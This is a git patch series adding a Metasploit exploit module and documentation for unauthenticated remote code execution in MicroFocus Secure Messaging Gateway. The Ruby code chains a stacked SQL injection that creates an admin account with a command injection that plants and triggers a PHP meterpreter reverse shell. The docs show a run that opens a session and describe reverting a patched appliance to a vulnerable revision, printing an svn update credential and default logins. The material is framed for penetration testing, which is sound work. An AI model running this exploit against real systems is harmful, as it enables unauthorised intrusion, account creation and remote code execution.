From 4c1c2e92882796772daf210c2553bab987e98801 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Wed, 4 Jul 2018 17:47:13 +0100 Subject: [PATCH 1/5] Adding Micro Focus Secure Messaging Gateway RCE --- .../microfocus_secure_messaging_gateway.md | 59 +++++ .../microfocus_secure_messaging_gateway.rb | 214 ++++++++++++++++++ 2 files changed, 273 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md create mode 100644 modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb diff --git a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md new file mode 100644 index 0000000000..45d7af8454 --- /dev/null +++ b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md @@ -0,0 +1,59 @@ +## Vulnerable Application +This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command under the context of the web user. + +One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding, which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having a valid session. + +Combining these vulnerabilities gives the opportunity execute operation system commands under the context of the web user. + +**Vulnerable Application Installation Steps** + +Complate following trial submission form. You will be able to download the product as a OVA or ISO file. + +[https://www.microfocus.com/products/secure-gateway/trial/](https://www.microfocus.com/products/secure-gateway/trial/) + +## Verification Steps + +A successful check of the exploit will look like this: + +- [ ] Start `msfconsole` +- [ ] `use exploit/linux/http/microfocus_secure_messaging_gateway ` +- [ ] Set `RHOST` +- [ ] Set `LHOST` +- [ ] Run `check` +- [ ] **Verify** that you are seeing `The target is vulnerable` +- [ ] Run `exploit` +- [ ] **Verify** that you are seeing `Creating an user with appropriate privileges` in console. +- [ ] **Verify** that you are seeing `User successfully created. Username : rmcynlbredxqh` in console. +- [ ] **Verify** that you are seeing `Authenticating with created user` in console. +- [ ] **Verify** that you are seeing `Successfully authenticated` in console. +- [ ] **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console. +- [ ] **Verify** that you are seeing `Payload is successfully implanted` in console. +- [ ] **Verify** that you are seeing `Triggerring an implanted payload` in console. +- [ ] **Verify** that you are getting meterpreter session. + +## Scenarios + +``` +msf5 > use exploit/linux/http/microfocus_secure_messaging_gateway +msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > set RHOSTS 12.0.0.25 +RHOSTS => 12.0.0.25 +msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > set LHOST 12.0.0.1 +LHOST => 12.0.0.1 +msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run + +[*] Started reverse TCP handler on 12.0.0.1:4444 +[*] Creating an user with appropriate privileges +[+] User successfully created. Username : rmcynlbredxqh +[*] Authenticating with created user +[+] Successfully authenticated +[*] Creating a domain record with a malformed DKIM data +[+] Payload is successfully implanted +[*] Triggerring an implanted payload +[*] Sending stage (37775 bytes) to 12.0.0.25 +[*] Meterpreter session 10 opened (12.0.0.1:4444 -> 12.0.0.25:44332) at 2018-06-25 20:26:54 +0100 +[*] Cleaning up... + +meterpreter > pwd +/opt/gwava/gwavaman/http/admin/contents/ou +meterpreter > +``` \ No newline at end of file diff --git a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb new file mode 100644 index 0000000000..349ef53417 --- /dev/null +++ b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb @@ -0,0 +1,214 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "MicroFocus Secure Messaging Gateway Remote Code Execution", + 'Description' => %q{ + This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. + An unauthenticated user can execute a terminal command under the context of the web user. + + One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding, + which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. + manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible + to access this endpoint without having a valid session. + + Combining these vulnerabilities gives the opportunity execute operation system commands under the context + of the web user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'], + ['CVE', '2018-12464'], + ['CVE', '2018-12465'], + ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'], + ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133'] + ], + 'DefaultOptions' => + { + 'Payload' => 'php/meterpreter/reverse_tcp', + 'Encoder' => 'php/base64' + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Jun 19 2018", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ] + ) + end + + def execute_query(query) + # + # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques + # but since we are able to use stacked-query approach, following form of payload is required in order to be able + # get back the output of query ! + # + r = rand_text_alphanumeric(3 + rand(3)) + sql = r + sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine " + sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine " + sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; " + sql << query + sql << "; -- " + sql << r + + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'), + 'vars_post' => { + 'appkey' => r + } + ) + + end + + def something_went_wrong + fail_with Failure::Unknown, 'Something went wrong' + end + + def check + r = rand_text_numeric(15 + rand(20)) + res = execute_query("SELECT #{r}") + if res && res.code == 200 && res.body.include?(r) + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def implant_payload(cookie) + print_status('Creating a domain record with a malformed DKIM data') + p = [ + { + :id => 'temp_0', + :Description => rand_text_alpha(5), + :DkimList => [ + { + :Domain => "$(php -r '#{payload.encoded}')", + :Selector => '', + :TempId => 'tempDkim_1' + } + ] + } + ].to_json + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'), + 'cookie' => cookie, + 'vars_get' => { + 'cache' => 0, + }, + 'vars_post' => { + 'StateData' => '[{"ouid":1}]', + 'SaveData' => p + } + }) + + if res && res.code == 200 && res.body.include?('DbNodeId') + # Defining as global variable since we need to access them later within clean up function. + @domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId'] + @dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId'] + print_good('Payload is successfully implanted') + else + something_went_wrong + end + end + + def create_user + # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection + # issue location where requires a valid session ! + print_status('Creating an user with appropriate privileges') + + # Defining as global variable since we need to access them later within clean up function. + @username = rand_text_alpha_lower(5 + rand(20)) + @userid = rand_text_numeric(6 + rand(2)) + query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)" + + execute_query(query) + res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'") + + if res && res.code == 200 && res.body.include?(@username) + print_good("User successfully created. Username : #{@username}") + else + something_went_wrong + end + end + + def login + print_status("Authenticating with created user") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'), + 'vars_post' => { + 'username' => @username, + 'password' => rand_text_alpha_lower(5 + rand(20)), + 'passwordmandatory' => rand_text_alpha_lower(5 + rand(20)), + 'LimitInterfaceId' => 1 + } + ) + if res && res.code == 200 && res.body.include?('/ui/default/index.php') + print_good('Successfully authenticated') + cookie = res.get_cookies + else + something_went_wrong + end + cookie + end + + def exploit + unless check == CheckCode::Vulnerable + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + create_user + cookie = login + implant_payload(cookie) + + print_status('Triggerring an implanted payload') + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'), + 'cookie' => cookie, + 'vars_get' => { + 'cache' => 0, + }, + 'vars_post' => { + 'DkimRecordId' => @dkimid + } + }) + + end + + def on_new_session(session) + print_status('Cleaning up...') + cmd = "" + cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "' + cmd << "DELETE FROM account WHERE loginname ='#{@username}';" + cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};" + cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};" + cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};" + cmd << '"' + session.shell_command_token(cmd) + end + +end From 3b8149216fd5fef504646fbf47794d82fe73dde4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Wed, 4 Jul 2018 23:20:58 +0100 Subject: [PATCH 2/5] print a verbose error message --- .../http/microfocus_secure_messaging_gateway.rb | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb index 349ef53417..137b86b4ba 100644 --- a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb +++ b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb @@ -87,13 +87,16 @@ class MetasploitModule < Msf::Exploit::Remote end def check - r = rand_text_numeric(15 + rand(20)) + r = rand_text_numeric(15..35) res = execute_query("SELECT #{r}") - if res && res.code == 200 && res.body.include?(r) - Exploit::CheckCode::Vulnerable - else - Exploit::CheckCode::Safe + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown end + unless res.code == 200 && res.body.include?(r) + return CheckCode::Safe + end + CheckCode::Vulnerable end def implant_payload(cookie) From a272dcabd74bdc289ba7b13d1913526cd0ef16d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Thu, 5 Jul 2018 13:33:40 +0100 Subject: [PATCH 3/5] Fix typos and additional updates regarding to review --- .../microfocus_secure_messaging_gateway.md | 6 +++--- .../microfocus_secure_messaging_gateway.rb | 21 +++++++++++-------- 2 files changed, 15 insertions(+), 12 deletions(-) diff --git a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md index 45d7af8454..b37438049d 100644 --- a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md +++ b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md @@ -7,7 +7,7 @@ Combining these vulnerabilities gives the opportunity execute operation system c **Vulnerable Application Installation Steps** -Complate following trial submission form. You will be able to download the product as a OVA or ISO file. +Complete following trial submission form. You will be able to download the product as a OVA or ISO file. [https://www.microfocus.com/products/secure-gateway/trial/](https://www.microfocus.com/products/secure-gateway/trial/) @@ -28,7 +28,7 @@ A successful check of the exploit will look like this: - [ ] **Verify** that you are seeing `Successfully authenticated` in console. - [ ] **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console. - [ ] **Verify** that you are seeing `Payload is successfully implanted` in console. -- [ ] **Verify** that you are seeing `Triggerring an implanted payload` in console. +- [ ] **Verify** that you are seeing `Triggering an implanted payload` in console. - [ ] **Verify** that you are getting meterpreter session. ## Scenarios @@ -48,7 +48,7 @@ msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run [+] Successfully authenticated [*] Creating a domain record with a malformed DKIM data [+] Payload is successfully implanted -[*] Triggerring an implanted payload +[*] Triggering an implanted payload [*] Sending stage (37775 bytes) to 12.0.0.25 [*] Meterpreter session 10 opened (12.0.0.1:4444 -> 12.0.0.25:44332) at 2018-06-25 20:26:54 +0100 [*] Cleaning up... diff --git a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb index 137b86b4ba..5841e96237 100644 --- a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb +++ b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb @@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - Opt::RPORT(80), OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) ] ) @@ -129,8 +128,12 @@ class MetasploitModule < Msf::Exploit::Remote if res && res.code == 200 && res.body.include?('DbNodeId') # Defining as global variable since we need to access them later within clean up function. - @domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId'] - @dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId'] + begin + @domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId'] + @dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId'] + rescue => e + fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}" + end print_good('Payload is successfully implanted') else something_went_wrong @@ -140,11 +143,11 @@ class MetasploitModule < Msf::Exploit::Remote def create_user # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection # issue location where requires a valid session ! - print_status('Creating an user with appropriate privileges') + print_status('Creating a user with appropriate privileges') # Defining as global variable since we need to access them later within clean up function. - @username = rand_text_alpha_lower(5 + rand(20)) - @userid = rand_text_numeric(6 + rand(2)) + @username = rand_text_alpha_lower(5..25) + @userid = rand_text_numeric(6..8) query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)" execute_query(query) @@ -164,8 +167,8 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'), 'vars_post' => { 'username' => @username, - 'password' => rand_text_alpha_lower(5 + rand(20)), - 'passwordmandatory' => rand_text_alpha_lower(5 + rand(20)), + 'password' => rand_text_alpha_lower(5..25), + 'passwordmandatory' => rand_text_alpha_lower(5..25), 'LimitInterfaceId' => 1 } ) @@ -187,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote cookie = login implant_payload(cookie) - print_status('Triggerring an implanted payload') + print_status('Triggering an implanted payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'), From 48a903f0b358ea0e3901849e963e3abd451772f4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mehmet=20=C4=B0nce?= Date: Tue, 31 Jul 2018 00:57:32 +0300 Subject: [PATCH 4/5] Fixing r and sql variables use same object issue --- .../linux/http/microfocus_secure_messaging_gateway.rb | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb index 5841e96237..c9aa5388a6 100644 --- a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb +++ b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb @@ -62,20 +62,19 @@ class MetasploitModule < Msf::Exploit::Remote # but since we are able to use stacked-query approach, following form of payload is required in order to be able # get back the output of query ! # - r = rand_text_alphanumeric(3 + rand(3)) - sql = r + sql = rand_text_alphanumeric(3 + rand(3)) sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; " sql << query sql << "; -- " - sql << r + sql << rand_text_alphanumeric(3 + rand(3)) send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'), 'vars_post' => { - 'appkey' => r + 'appkey' => sql } ) @@ -129,8 +128,8 @@ class MetasploitModule < Msf::Exploit::Remote if res && res.code == 200 && res.body.include?('DbNodeId') # Defining as global variable since we need to access them later within clean up function. begin - @domainid = JSON.parse(res.body)['Nodes'][0]['DbNodeId'] - @dkimid = JSON.parse(res.body)['Nodes'][1]['DbNodeId'] + @domainid = res.get_json_document['Nodes'][0]['DbNodeId'] + @dkimid = res.get_json_document['Nodes'][1]['DbNodeId'] rescue => e fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}" end From 7d08c7172245bfc01f762a2d6c7221fb3a120028 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Mon, 30 Jul 2018 21:05:46 -0500 Subject: [PATCH 5/5] Update documentation about how to make it vulnerable again --- .../microfocus_secure_messaging_gateway.md | 97 +++++++++++++++---- 1 file changed, 76 insertions(+), 21 deletions(-) diff --git a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md index b37438049d..fdc5f34a41 100644 --- a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md +++ b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md @@ -1,35 +1,90 @@ ## Vulnerable Application -This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command under the context of the web user. +This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging +Gateway. An unauthenticated user can execute a terminal command under the context of the web user. -One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding, which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having a valid session. +One of the user supplied parameters of API endpoint is used by the application without input validation +and/or parameter binding, which leads to SQL injection vulnerability. Successfully exploiting this +vulnerability gives a ability to add new user onto system. manage_domains_dkim_keygen_request.php +endpoint is responsible for executing an operation system command. It's not possible to access this +endpoint without having a valid session. -Combining these vulnerabilities gives the opportunity execute operation system commands under the context of the web user. +Combining these vulnerabilities gives the opportunity execute operation system commands under the +context of the web user. -**Vulnerable Application Installation Steps** +## Vulnerable Application Installation Steps -Complete following trial submission form. You will be able to download the product as a OVA or ISO file. +Complete the following trial submission form. You will be able to [download the product as a OVA or ISO file](https://www.microfocus.com/products/secure-gateway/trial/). +Installation instructions can be [found here](https://www.microfocus.com/documentation/secure-messaging-gateway/GWAVA%207.0/secure-gateway.pdf). -[https://www.microfocus.com/products/secure-gateway/trial/](https://www.microfocus.com/products/secure-gateway/trial/) +Please note that newer trial appliances by default are no longer vulnerable to the attacks used by +this module, but for testing purposes there is a way to make it vulnerable again. + +First, go ahead and install the ISO. The appliance is based on Debian (for example, version 7 is +running a modified version of Ubuntu 16.04), so installation should be very similar to that. + +After you log into the system as "gwava:gwava" (which is the default credential), you should see +this on your screen: + +``` +#################################### + +Please run the following command: + +sudo /opt/gwavapreinstall.sh + +#################################### +``` + +The gwavapreinstall.sh script is what you need to modify. To do this, open it with your favorite text +editor with sudo like this: + +``` +$ sudo nano -w /opt/gwavapreinstall.sh +``` + +The bash script uses svn to download the latest software from the official site, but we can go back to +a specific commit to test the vulnerability again. Go ahead and find this line in the file: + +``` +sudo svn co --username gwavaupdate --password gwavam8 --non-interactive https://gwava7updates.gwava.com/update/gwava7/release $GWAVA_DIR +``` + +And modify to (the difference is the ```release@444```): + +``` +sudo svn co --username gwavaupdate --password gwavam8 --non-interactive https://gwava7updates.gwava.com/update/gwava7/release@444 $GWAVA_DIR +``` + +Make sure you save it, and then now run the script: + +``` +$ sudo /opt/gwavapreinstall.sh +``` + +After running the script, make sure to browse to https://[IP] to complete the installation. And then +after that, you are ready to test the module. + +Note that the module may not work at the very first try, but the second time should work. ## Verification Steps A successful check of the exploit will look like this: -- [ ] Start `msfconsole` -- [ ] `use exploit/linux/http/microfocus_secure_messaging_gateway ` -- [ ] Set `RHOST` -- [ ] Set `LHOST` -- [ ] Run `check` -- [ ] **Verify** that you are seeing `The target is vulnerable` -- [ ] Run `exploit` -- [ ] **Verify** that you are seeing `Creating an user with appropriate privileges` in console. -- [ ] **Verify** that you are seeing `User successfully created. Username : rmcynlbredxqh` in console. -- [ ] **Verify** that you are seeing `Authenticating with created user` in console. -- [ ] **Verify** that you are seeing `Successfully authenticated` in console. -- [ ] **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console. -- [ ] **Verify** that you are seeing `Payload is successfully implanted` in console. -- [ ] **Verify** that you are seeing `Triggering an implanted payload` in console. -- [ ] **Verify** that you are getting meterpreter session. +1. Start `msfconsole` +2. `use exploit/linux/http/microfocus_secure_messaging_gateway ` +3. Set `RHOST` +4. Set `LHOST` +5. Run `check` +6. **Verify** that you are seeing `The target is vulnerable` +7. Run `exploit` +8. **Verify** that you are seeing `Creating an user with appropriate privileges` in console. +9. **Verify** that you are seeing `User successfully created. Username : rmcynlbredxqh` in console. +10. **Verify** that you are seeing `Authenticating with created user` in console. +11. **Verify** that you are seeing `Successfully authenticated` in console. +12. **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console. +13. **Verify** that you are seeing `Payload is successfully implanted` in console. +14. **Verify** that you are seeing `Triggering an implanted payload` in console. +15. **Verify** that you are getting meterpreter session. ## Scenarios